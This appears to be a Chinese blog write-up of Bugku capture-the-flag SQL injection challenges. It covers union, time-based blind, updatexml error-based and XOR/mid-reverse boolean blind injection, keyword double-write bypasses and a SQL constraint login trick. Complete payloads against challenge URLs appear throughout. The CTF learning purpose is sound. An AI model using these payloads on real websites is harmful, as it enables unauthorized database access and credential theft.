Bugku sql注入

成绩单

输入1,2,3发现都会显示不同的成绩单,输入4没有东西,输入1’没有东西显示,输入1’#又有了,测试了一下,没有过滤,那就可以开始进行注入了

首先判断列数

1’ order by 1#, 1’ order by 2#, 1’order by 3#, 1’ order by 4#

到order by 5就不行了,所以得知是4列

判断回显

4' union select 1,2,3,4#

爆库

4' union select 1,2,3,database()#

爆表

4' union select 1,2,3, table_name from information_schema.tables where table_schema='skctf_flag'#

爆列

4' union select 1,2,3, column_name from information_schema.columns where table_name='fl4g'#

得到flag

4' union select 1,2,3,skctf_flag from fl4g#

login1

尝试登录admin,失败,尝试注册admin,用户名已存在,提示sql约束攻击

参考: http://netsecurity.51cto.com/art/201701/526861.htm

于是注册一个账号admin 1,但是登录之后她会说不是管理员也想看flag?! 于是注册一个admin (admin加空格)的账号,登录就能看到flag了

insert into注入

发现后台会将访问者的ip添加到数据库中,并且如果请求头中存在X-Forwarded-For的话,ip就等于它的值,于是考虑http头注入

尝试在请求头中添加X-Forwarded-For,发现无论是什么值,都会将他返回到页面上,于是考虑时间盲注,测试一下,发现真的延迟5s显示了

接下来就是脚本爆库

payload ="1'+(select case when (substring((select schema_name from information_schema.SCHEMATA limit 1 offset {0}) from {1} for 1)='{2}') then sleep(5) else 1 end) and '1'='1"

爆表

payload ="1'+(select case when (substring((select table_name from information_schema.TABLES where table_schema='web15' limit 1 offset {0}) from {1} for 1)='{2}') then sleep(5) else 1 end) and '1'='1"

爆字段

payload ="1'+(select case when (substring((select column_name from information_schema.COLUMNS where table_name='flag' limit 1 offset {0}) from {1} for 1)='{2}') then sleep(5) else 1 end) and '1'='1"

Getflag

payload ="1'+(select case when (substring((select flag from flag) from {0} for 1)='{1}') then sleep(5) else 1 end) and '1'='1"

这是一个神奇的登陆框

看到sql就知道这题是道注入题了,于是测试一下,正常登录他会说try again,在username后面加了个\发现报错,再加个#又正常了,说明#没有被吃掉,测试一下发现一些关键字都没有过滤掉,然后就可以进行注入了

admin_name=admin" or 1=1#&admin_passwd=admin123&submit=GO+GO+GO

判断列数

admin_name=admin" order by 3#&admin_passwd=admin123&submit=GO+GO+GO

判断回显

admin_name=admin" union select 1,2#&admin_passwd=admin123&submit=GO+GO+GO

爆数据库

admin_name=admin" union select database(),2#&admin_passwd=admin123&submit=GO+GO+GO

爆表

admin_name=admin" union select table_name,2 from information_schema.tables where table_schema="bugkusql1"#&admin_passwd=admin123&submit=GO+GO+GO

爆字段

admin_name=admin" union select column_name,2 from information_schema.columns where table_name="flag1" #&admin_passwd=admin123&submit=GO+GO+GO

Getflag

admin_name=admin" union select flag1,2 from flag1#&admin_passwd=admin123&submit=GO+GO+GO

多次

id=5时,她告诉我们能可以sql注入

于是开始尝试,加个 ’ 报错了,加个#也报错了,于是换成%23,不报错了,然后再进一步测试有什么被吃掉了,id=1’ or 1=1%23报错,id=1’ and 1=1%23也报错,于是猜测or、and都被吃掉了,于是尝试双写绕过,id=1’ oorr 1=1%23正常了,经过测试union、select也被吃掉了,我们都可以双写绕过,这时我们就可以开始注入了,首先判断列数

http://120.24.86.145:9004/1ndex.php?id=1'oorrder by 3%23

列数为2,确定回显

http://120.24.86.145:9004/1ndex.php?id=-1' ununionion selselectect 1,2%23

爆数据库

http://120.24.86.145:9004/1ndex.php?id=-1' ununionion selselectect 1,database()%23

爆表

http://120.24.86.145:9004/1ndex.php?id=-1' ununionion selselectect 1,table_name from infoorrmation_schema.tables where table_schema='web1002-1'%23

爆字段

http://120.24.86.145:9004/1ndex.php?id=-1' ununionion selselectect 1,column_name from infoorrmation_schema.columns where table_name='flag1'%23

Get 假flag

http://120.24.86.145:9004/1ndex.php?id=-1' ununionion selselectect 1,flag1 from flag1%23

得到了一串不知道什么东西的东西,后来想起题目说有两个flag,于是又从头开始爆

爆表,发现除了flag1还有hint

http://120.24.86.145:9004/1ndex.php?id=-1' ununionion selselectect 1,group_concat(table_name) from infoorrmation_schema.tables where table_schema='web1002-1'%23

爆字段,在hint中没有发现什么东西,在flag1中发现除了flag1还有address

http://120.24.86.145:9004/1ndex.php?id=-1' ununionion selselectect 1,group_concat(column_name) from infoorrmation_schema.columns where table_name='flag1'%23

成功找到下一关地址

http://120.24.86.145:9004/1ndex.php?id=-1' ununionion selselectect 1,group_concat(address) from flag1%23

?id=1’报错

?id=1’#报错,换成?id=1’--+,成功

判断数据库长度  ?id=1' and length(database())=10--+   长度为9

判断列数 ?id=1' order by 2--+   两列

经过测试发现union、substr被吃掉了,于是考虑用updatexml报错注入

爆库

?id=-1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1)--+

爆表

?id=-1' and updatexml(1,concat(0x7e,(select group_concat(table_name)

from information_schema.tables where table_schema=database()),0x7e),1)--+

爆字段

?id=-1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag2'),0x7e),1)--+

Getflag

?id=-1' and updatexml(1,concat(0x7e,(select flag2 from flag2),0x7e),1)--+

这里还有个小坑,题目说flag均为小写,flag中的B得改成b

这题除了用updatexml报错注入还可以用盲注,下面是脚本

database
table

字段和爆表的脚本是差不多的就不放了

flag

Sql注入2

登录进去有一个登录框,于是习惯性试一下admin/admin、admin/admin123,emmm然后第二次就登进去了,看到

露出尴尬而不是礼貌的微笑,ls一下看到flag,摇头.gif

注入操作参考https://xz.aliyun.com/t/2583

抓包测试一下,发现有username、password error两种报错,尝试测试一下什么东西被过滤掉了,发现#、or、and、union、order、空格被过滤掉了,并且被过滤的话会有提示

后来想到提示:!,!=,=,+,-,^,% 提示的意思会不会是这些符号都还在呢,这个时候 ^ 就吸引我的注意力了,一般数字的时候,^ 会有比较好的效果,比如

?id = 1^1    -> 0

?id = 1^0    -> 1

但是在空格、or、and等关键词没有的时候,要怎么操作呢?我们可以尝试使用 -

当字符串与数字进行运算时,字符串会被转换成数值,比如

admin -> 0     1admin ->1    admin1 -> 0

因此'admin'-1-''   ->   0-1-0=-1

       'admin'-0-''   ->   0-0-0=0

于是我们测试一下,我们可以看到当username=admin'-0-' 为true,username= admin'-1-' 为false,

这时后台的查询语句就相当于

$query = select * from user where username = $ username;

$query = select * from user where username =0;

这时当字符串跟数字比较时,username被转换成了0,因此为true

这样我们就成功闭合了单引号

下面我们就尝试构造跟下面类似的语句

ascii(substr((select database()),1,1))>-1

ascii(mid(passwd,1,1))=%d

把这个语句放在0和1的位置就可以取出数据

但是这里逗号和空格都不能用,那么substr就用不了,但是我们可以使用mid(),比如

passwd=abc123

那我们可以用以下方式来取出想要的数据

mid((passwd)from(-1)) ->3

mid((passwd)from(-2)) ->23

mid((passwd)from(-3)) ->123

倒叙输出几位,但是这样如果要截取最后一位的话,显然每次截取的都是3,因此我们反转过来,使得每次截取出来的不一样

先倒叙取出几位

mid((passwd)from(-%d))

反转

reverse(mid((passwd)from(-%d)))

取最后一位

mid(reverse(mid((passwd)from(-%d)))from(-1))

比较ascii值

ascii(mid(reverse(mid((passwd)from(-%d)))from(-1)))= %d

测试一下发现

当表达式为真时,返回的是username error!!

当表达式为假时,返回的是password error!!

因此我们就可以利用这个特点进行盲注

下面是脚本

至于这个passwd怎么来的呢,根据form表单猜的,因为很多关键词都被过滤掉了,很难搞到

运行得到

猜测其为md5

用其作为密码登录admin账号上去看到

执行ls得到flag

报错注入

挂了...

Trim的日记本

挂了....

login3

随便输了个用户名,发现

当用户名存在时,密码为空或者错误则会返回

也就是说,后台是先判断用户名,当用过户名存在时才会判断密码是否正确,为了验证,我又试了一下随便输入个用户名但是不输入密码,发现也是返回用户名不存在

admin用户名是存在的,尝试在其后面加 ' ,发现说username不存在了,加了个#又变成password error了,说明#没有被吃掉,于是我们可以利用此来进行布尔盲注

接着测试了一下发现空格、and、union、=、+、,、information被过滤了,并且被过滤的话会有提示

=可以用<>代替,空格可以用()代替

因为union、+、and都被过滤掉了,因此我们考虑通过异或来注入

比如admin^0^0  -> 0   admin^1^0  ->1

我们只要将payload插入到中间的0、1的那个位置就能进行布尔盲注了,当条件成立时会返回password error,不成立时则返回username does not exist,根据这个我们可以判断注入是否成功

先爆数据库

payload = “admin’^(ascii(mid(database()from(%d)))<>%d^0#”%(i,ord(j))

数据库:blindsql

但是由于information被禁掉了,因此我们只能猜表名猜字段

Md5解一下,登录得到flag

作者水平有限,若有错误请指出Orz

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 194,524评论 5 460
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 81,869评论 2 371
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 141,813评论 0 320
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 52,210评论 1 263
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 61,085评论 4 355
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 46,117评论 1 272
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 36,533评论 3 381
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 35,219评论 0 253
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 39,487评论 1 290
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 34,582评论 2 309
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 36,362评论 1 326
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 32,218评论 3 312
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 37,589评论 3 299
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 28,899评论 0 17
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 30,176评论 1 250
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 41,503评论 2 341
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 40,707评论 2 335

推荐阅读更多精彩内容

  • pyspark.sql模块 模块上下文 Spark SQL和DataFrames的重要类: pyspark.sql...
    mpro阅读 9,423评论 0 13
  • 姓名:于川皓 学号:16140210089 转载自:https://baike.baidu.com/item/sq...
    道无涯_cc76阅读 1,919评论 0 2
  • Sql注入定义: 就是通过把sql命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行...
    付出从未后悔阅读 676评论 0 3
  • 晨光,如微波 轻柔荡漾,柔进我的心窝 一天的开始,期待的是你的问候 想要的是你的,遇见 开始了,我欣悦的等待 午后...
    喜欢就追阅读 290评论 0 7
  • 好久不曾感动了,因为日子过的很平淡,渐行渐远的脚步随时光的流逝而消散,不再有激情澎湃的思绪,慢慢放下所有不切...
    付文丰阅读 310评论 1 2